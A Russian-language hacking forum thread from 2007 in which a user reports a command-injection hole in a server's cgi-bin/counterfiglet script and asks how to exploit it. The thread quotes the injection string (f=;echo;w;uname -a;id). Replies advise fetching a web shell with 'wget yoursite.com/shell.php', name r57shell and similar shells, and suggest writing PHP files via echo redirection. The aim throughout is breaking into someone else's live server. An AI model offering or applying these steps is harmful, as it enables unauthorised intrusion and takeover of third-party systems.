Дыра cgi-bin/counterfiglet.... |
08.02.2007, 00:14
|
|
Новичок
Регистрация: 07.02.2007
Сообщений: 8
С нами:
10134522
Репутация:
0
|
|
Дыра cgi-bin/counterfiglet....
Нашёл дыру на одном сервере вот такого типа: cgi-bin/counterfiglet/nc/f=;echo;w;uname%20-a;id...
Прочитал об этой дыре много... С её помошью можно залить на сервак Shell... Проблема в том что сам Shell найти немогу. Нашёл когдато здесь на форуме PHP сплойт под эту дыру, а скомпилить неполучается... Да даже дело не в скомпилить, просто я её поошибке затёр. И сейчас немогу найти его.Помоему инекция конкретно работает с этой дырой. Вообщем: Помогите мне воспользоватся этой дырой, своими советами и подсказками. Shell бы тоже непомишал. Или на худой конец помогите найти здесь на форуме Php сплойт для данной дыры.
Последний раз редактировалось vipklient; 08.02.2007 в 00:16..
|
|
|
08.02.2007, 00:34
|
|
Banned
Регистрация: 27.06.2006
Сообщений: 1,614
С нами:
10459106
Репутация:
2996
|
|
ты команды можешь исполнять что еще тебе надо?
|
|
|
|
08.02.2007, 00:56
|
|
Новичок
Регистрация: 07.02.2007
Сообщений: 8
С нами:
10134522
Репутация:
0
|
|
Сообщение от [ cash ]
ты команды можешь исполнять что еще тебе надо?
А поподобнее можно...
|
|
|
|
08.02.2007, 00:48
|
|
Постоянный
Регистрация: 01.01.2007
Сообщений: 796
С нами:
10188506
Репутация:
861
|
|
wget yoursite.com/shell.php
а шеллы прям по гуглю r57shell, antichat shell ну или в поиске на ачате
|
|
|
|
08.02.2007, 01:06
|
|
Новичок
Регистрация: 07.02.2007
Сообщений: 8
С нами:
10134522
Репутация:
0
|
|
Сообщение от n0ne
wget yoursite.com/shell.php
а шеллы прям по гуглю r57shell, antichat shell ну или в поиске на ачате
Напиши плз. как правелно залить r57shell.
|
|
|
|
08.02.2007, 01:11
|
|
Banned
Регистрация: 27.06.2006
Сообщений: 1,614
С нами:
10459106
Репутация:
2996
|
|
Для начало тебе нужна папка с правами на запись.
Если разрешенно записывать в папку с самим cgi скриптом то туда надо закинуть cgi shell.
Вообще определись что тебе попробуй команды типо echо 123>123.php а вообще можно полноценно лазить как через шелл... просто исполняя команды так...
2n0ne
Гениально  |
|
|
|
08.02.2007, 01:25
|
|
Новичок
Регистрация: 07.02.2007
Сообщений: 8
С нами:
10134522
Репутация:
0
|
|
А если без шелла. Как найти команды которые он будет воспринимать?
|
|
|
|
08.02.2007, 01:31
|
|
Banned
Регистрация: 27.06.2006
Сообщений: 1,614
С нами:
10459106
Репутация:
2996
|
|
все команды nix систем..
Если там nix...
|
|
|
|
08.02.2007, 01:36
|
|
Banned
Регистрация: 01.08.2006
Сообщений: 725
С нами:
10408706
Репутация:
4451
|
|
Ради интереса вбил в поисковик counterfiglet нашел вот это http://herurg.chat.ru/counterfiglet.txt . Внимания заслуживает дата 1995
|
|
|
|
08.02.2007, 18:08
|
|
Постоянный
Регистрация: 01.01.2007
Сообщений: 796
С нами:
10188506
Репутация:
861
|
|
[ cash ], уху)) я такой 
Автор, после "f=" пишешь команду)
попробуй "ls -la" без кавычек, ответ есть?
и если, как ты написал, тебе сервер не отвечает, с чего ты взял что ты можешь там что-то исполнять?)) |
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
